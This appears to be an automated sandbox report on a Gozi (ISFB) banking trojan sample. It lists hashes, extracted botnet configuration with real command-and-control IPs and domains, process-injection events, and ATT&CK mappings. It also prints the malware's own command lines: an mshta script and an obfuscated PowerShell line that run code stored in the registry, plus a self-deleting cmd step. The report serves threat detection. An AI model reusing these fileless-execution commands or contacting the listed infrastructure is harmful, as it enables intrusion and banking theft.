gozi | 433da5edf5e6ec56e9c19b942c086171a2d41091ffe7e3bc6f98a52731a7f0e0

Analysis

max time kernel
151s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
05-10-2023 02:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe
Size

296KB
MD5

f5830dc3fe80761eb82a0754b1697e6b
SHA1

9f25e979cb2de3857278645b60c4afa37d0e6702
SHA256

ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6
SHA512

8fc4bf848205a3d28dc457e0e09f0831336be36a0824e93818a85207a8a8a63597815918f53dd472cf99ec1f08f8a2aa7cb1a5b43cf7c9782de69899620298fa
SSDEEP

3072:YaL9FpSv0N0aIlzHMyXxpJD4xXvw1h+XKwY1a/I6RMxY:tpF0vW0aIlf+/w1hIr2aI6G

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3380 set thread context of 2636	3380	powershell.exe	Explorer.EXE
PID 2636 set thread context of 3784	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 set thread context of 4008	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 set thread context of 4756	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 set thread context of 4516	2636	Explorer.EXE	cmd.exe
PID 4516 set thread context of 3296	4516	cmd.exe	PING.EXE
PID 2636 set thread context of 2932	2636	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

244 2944 WerFault.exe ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3296 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3296 PING.EXE

pid	pid_target	process	target process
244	2944	WerFault.exe	ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe

pid	process
3296	PING.EXE

pid	process
3296	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exepowershell.exeExplorer.EXE

pid	process
2944	ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe
2944	ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe
3380	powershell.exe
3380	powershell.exe
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3380 powershell.exe
2636 Explorer.EXE
2636 Explorer.EXE
2636 Explorer.EXE
2636 Explorer.EXE
4516 cmd.exe
2636 Explorer.EXE

pid	process
3380	powershell.exe
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
4516	cmd.exe
2636	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

2636 Explorer.EXE

pid	process
2636	Explorer.EXE

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 496 wrote to memory of 3380	496	mshta.exe	powershell.exe
PID 496 wrote to memory of 3380	496	mshta.exe	powershell.exe
PID 3380 wrote to memory of 3328	3380	powershell.exe	csc.exe
PID 3380 wrote to memory of 3328	3380	powershell.exe	csc.exe
PID 3328 wrote to memory of 1292	3328	csc.exe	cvtres.exe
PID 3328 wrote to memory of 1292	3328	csc.exe	cvtres.exe
PID 3380 wrote to memory of 3928	3380	powershell.exe	csc.exe
PID 3380 wrote to memory of 3928	3380	powershell.exe	csc.exe
PID 3928 wrote to memory of 3244	3928	csc.exe	cvtres.exe
PID 3928 wrote to memory of 3244	3928	csc.exe	cvtres.exe
PID 3380 wrote to memory of 2636	3380	powershell.exe	Explorer.EXE
PID 3380 wrote to memory of 2636	3380	powershell.exe	Explorer.EXE
PID 3380 wrote to memory of 2636	3380	powershell.exe	Explorer.EXE
PID 3380 wrote to memory of 2636	3380	powershell.exe	Explorer.EXE
PID 2636 wrote to memory of 3784	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3784	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3784	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3784	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4008	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4008	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4516	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 4516	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 4516	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 4008	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4008	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4756	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4756	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4756	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4756	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4516	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 4516	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 2932	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 2932	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 2932	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 2932	2636	Explorer.EXE	cmd.exe
PID 4516 wrote to memory of 3296	4516	cmd.exe	PING.EXE
PID 4516 wrote to memory of 3296	4516	cmd.exe	PING.EXE
PID 4516 wrote to memory of 3296	4516	cmd.exe	PING.EXE
PID 4516 wrote to memory of 3296	4516	cmd.exe	PING.EXE
PID 4516 wrote to memory of 3296	4516	cmd.exe	PING.EXE
PID 2636 wrote to memory of 2932	2636	Explorer.EXE	cmd.exe
PID 2636 wrote to memory of 2932	2636	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3784

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2636

C:\Users\Admin\AppData\Local\Temp\ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe
"C:\Users\Admin\AppData\Local\Temp\ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 472
3⤵
- Program crash
PID:244

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dg8n='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dg8n).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gscqnefe -value gp; new-alias -name ewmhlhetlj -value iex; ewmhlhetlj ([System.Text.Encoding]::ASCII.GetString((gscqnefe "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r51ex1fn\r51ex1fn.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3328

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C22.tmp" "c:\Users\Admin\AppData\Local\Temp\r51ex1fn\CSCFAE0A00E31B546AEA890876985B188B.TMP"
5⤵
PID:1292

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yy0qmobc\yy0qmobc.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4CFD.tmp" "c:\Users\Admin\AppData\Local\Temp\yy0qmobc\CSC358EC6A21C5C4ED8B257176633EE5A.TMP"
5⤵
PID:3244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4516

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3296

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2932

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2944 -ip 2944
1⤵
PID:988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4C22.tmp

Filesize
1KB

MD5
7d0cf7075412b3e3a3b7677b5f406004

SHA1
c8824534d51f403c60c1cfa6f664f8e990450b8a

SHA256
a51d97873de99e1b3025251dfdb895be452f0253f164508e23b64b9ace9bd096

SHA512
49ad8074432ba8f1194c93cb7fdaf39eeff9ef9aa808b7da58519f7c3c9824f40aa506055cfd23d36d7672aab01dda2646ae50e1920ff410c8a78a3b6dae6f7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4CFD.tmp

Filesize
1KB

MD5
874acdfc046c1671c163d3f43fa35c7c

SHA1
88ad932061536dcd06991ec4f748058d90f4cb18

SHA256
eea9fe0f4173982ec5123c098c5b3df1b709b71ed2816e7c38092b0441860076

SHA512
3102ecfa09c1dec2d7419171c592e3db2d840739c655b127b0f9b74cde7a42c8c428095d4e27fb1d70e8a8261cdbe42c0e92d50f464c1e8868a603bd39075d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3pv10e4d.f23.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\r51ex1fn\r51ex1fn.dll

Filesize
3KB

MD5
a3d6f718aba2cdfff0a436ba1d204fb4

SHA1
603758c01ecb682de08427e43d6344a29f277e0c

SHA256
d396ec00fc3a3515c7e66892f24238a05a98fe06898b980cf555e11c23bcd404

SHA512
790077aba838bbb655d37c9a2470e0a8cf0c120708fb2db40b7b3f8e17254d8d485ec262be11514b6cadafae9c1be878e605851b07e46c9b5e977a3014371e9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\yy0qmobc\yy0qmobc.dll

Filesize
3KB

MD5
5287d387b9a927a5f2c7c102cc2f9a45

SHA1
73a58920919f34cc859985589bae63c00340cbd7

SHA256
e8c5558d14281024d6e8a4d6e4b110f918738b06c2c8bf89f32c65bddda54412

SHA512
15ae14525d87f07c0f1ec08466390ba0fdeb86f31773fe7673d249bb17721b8c2755b10542783d406bda288e4e4e3df5b8be23f1e985109a85cbab42379e2158

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r51ex1fn\CSCFAE0A00E31B546AEA890876985B188B.TMP

Filesize
652B

MD5
b9d0fa2388671a09599d623942a9692b

SHA1
c7d46e200c961bf23d4416348406fd0875bf6ac4

SHA256
91d2920bb9bb7a19fd04a84452b050ba201df493d404be6f04ddd985cb0583c2

SHA512
b1b5064e3e6eedf2b741212063cb557e359db5fce205e2500f038f4956730dc76f0e7d4207eb88f4aefec7bf82f58835cca52b0057dfd1e1a6bd870ac9781f4f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r51ex1fn\r51ex1fn.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r51ex1fn\r51ex1fn.cmdline

Filesize
369B

MD5
c52cf462f2ffa12dc7b4669764cbf3af

SHA1
84c5351d84f6c43b9a002c4b2955c608125a2558

SHA256
9ad050c65fa0a9a531b1c0b110240570ad7e9f57ff1fa544f73f257db4788f22

SHA512
41acace684f72644b24f8cf70151b5884300b91fdaac7b12f5f36b5e501780fccc568679a12028c95f89ffb8da45eec0fa8d6b17a699915d0ebb193da555d306

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yy0qmobc\CSC358EC6A21C5C4ED8B257176633EE5A.TMP

Filesize
652B

MD5
2712d29fd94a5ae80c11e5a868e7d329

SHA1
3c22942a0acd7d32e2f83b736655ac66893302c4

SHA256
0c235d7485f8eeaa5f8bd59565a8f3c24346afd3e1a2b51588657321c154c7e3

SHA512
9a0874fc3abf19473fc8dd27efa13f08c9ae7fd9a379a1506b91f94d5dbecf3583d7beb86dc2fe73efcb787f64710682194b85803f63a070c7d847f5c531856b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yy0qmobc\yy0qmobc.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yy0qmobc\yy0qmobc.cmdline

Filesize
369B

MD5
550be1b1dac4646558075c1a65315a5c

SHA1
d261784645b2fcf6183b49c455c902530cf31258

SHA256
67da294d32f8c1a2d36bd325f7c61340c35aafebd32af9a84da070208fd49004

SHA512
ceef7f13517af87f4c47d955f060cde4dcb60d91bf6d4fee7e33851a61b75742762379f78967db1cdefeda247b493a838f8138f98f467be49ad7397a2591ae48

Download Submit
memory/2636-65-0x0000000009200000-0x00000000092A4000-memory.dmp

Filesize
656KB

Download
memory/2636-66-0x0000000001580000-0x0000000001581000-memory.dmp

Filesize
4KB

Download
memory/2636-104-0x0000000009200000-0x00000000092A4000-memory.dmp

Filesize
656KB

Download
memory/2932-108-0x0000000000C00000-0x0000000000C98000-memory.dmp

Filesize
608KB

Download
memory/2932-114-0x0000000000C00000-0x0000000000C98000-memory.dmp

Filesize
608KB

Download
memory/2932-112-0x0000000000690000-0x0000000000691000-memory.dmp

Filesize
4KB

Download
memory/2944-7-0x0000000004030000-0x000000000403D000-memory.dmp

Filesize
52KB

Download
memory/2944-4-0x0000000002430000-0x0000000002530000-memory.dmp

Filesize
1024KB

Download
memory/2944-5-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/2944-6-0x0000000003FD0000-0x0000000003FDB000-memory.dmp

Filesize
44KB

Download
memory/2944-3-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/2944-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmp

Filesize
44KB

Download
memory/2944-1-0x0000000002430000-0x0000000002530000-memory.dmp

Filesize
1024KB

Download
memory/2944-10-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/2944-116-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/3296-118-0x0000012D152F0000-0x0000012D15394000-memory.dmp

Filesize
656KB

Download
memory/3296-105-0x0000012D151C0000-0x0000012D151C1000-memory.dmp

Filesize
4KB

Download
memory/3296-103-0x0000012D152F0000-0x0000012D15394000-memory.dmp

Filesize
656KB

Download
memory/3380-61-0x000001F97F110000-0x000001F97F118000-memory.dmp

Filesize
32KB

Download
memory/3380-47-0x000001F97ECA0000-0x000001F97ECA8000-memory.dmp

Filesize
32KB

Download
memory/3380-24-0x000001F97EA80000-0x000001F97EAA2000-memory.dmp

Filesize
136KB

Download
memory/3380-32-0x00007FF9087A0000-0x00007FF909261000-memory.dmp

Filesize
10.8MB

Download
memory/3380-34-0x000001F97EC30000-0x000001F97EC40000-memory.dmp

Filesize
64KB

Download
memory/3380-33-0x000001F97EC30000-0x000001F97EC40000-memory.dmp

Filesize
64KB

Download
memory/3380-76-0x000001F97F120000-0x000001F97F15D000-memory.dmp

Filesize
244KB

Download
memory/3380-75-0x00007FF9087A0000-0x00007FF909261000-memory.dmp

Filesize
10.8MB

Download
memory/3380-63-0x000001F97F120000-0x000001F97F15D000-memory.dmp

Filesize
244KB

Download
memory/3784-78-0x0000015829A00000-0x0000015829AA4000-memory.dmp

Filesize
656KB

Download
memory/3784-79-0x00000158295C0000-0x00000158295C1000-memory.dmp

Filesize
4KB

Download
memory/3784-109-0x0000015829A00000-0x0000015829AA4000-memory.dmp

Filesize
656KB

Download
memory/4008-115-0x0000015966430000-0x00000159664D4000-memory.dmp

Filesize
656KB

Download
memory/4008-85-0x00000159663F0000-0x00000159663F1000-memory.dmp

Filesize
4KB

Download
memory/4008-84-0x0000015966430000-0x00000159664D4000-memory.dmp

Filesize
656KB

Download
memory/4516-96-0x0000023B54D90000-0x0000023B54D91000-memory.dmp

Filesize
4KB

Download
memory/4516-94-0x0000023B54DC0000-0x0000023B54E64000-memory.dmp

Filesize
656KB

Download
memory/4516-119-0x0000023B54DC0000-0x0000023B54E64000-memory.dmp

Filesize
656KB

Download
memory/4756-91-0x000002A228D80000-0x000002A228D81000-memory.dmp

Filesize
4KB

Download
memory/4756-90-0x000002A22AF80000-0x000002A22B024000-memory.dmp

Filesize
656KB

Download
memory/4756-117-0x000002A22AF80000-0x000002A22B024000-memory.dmp

Filesize
656KB

Download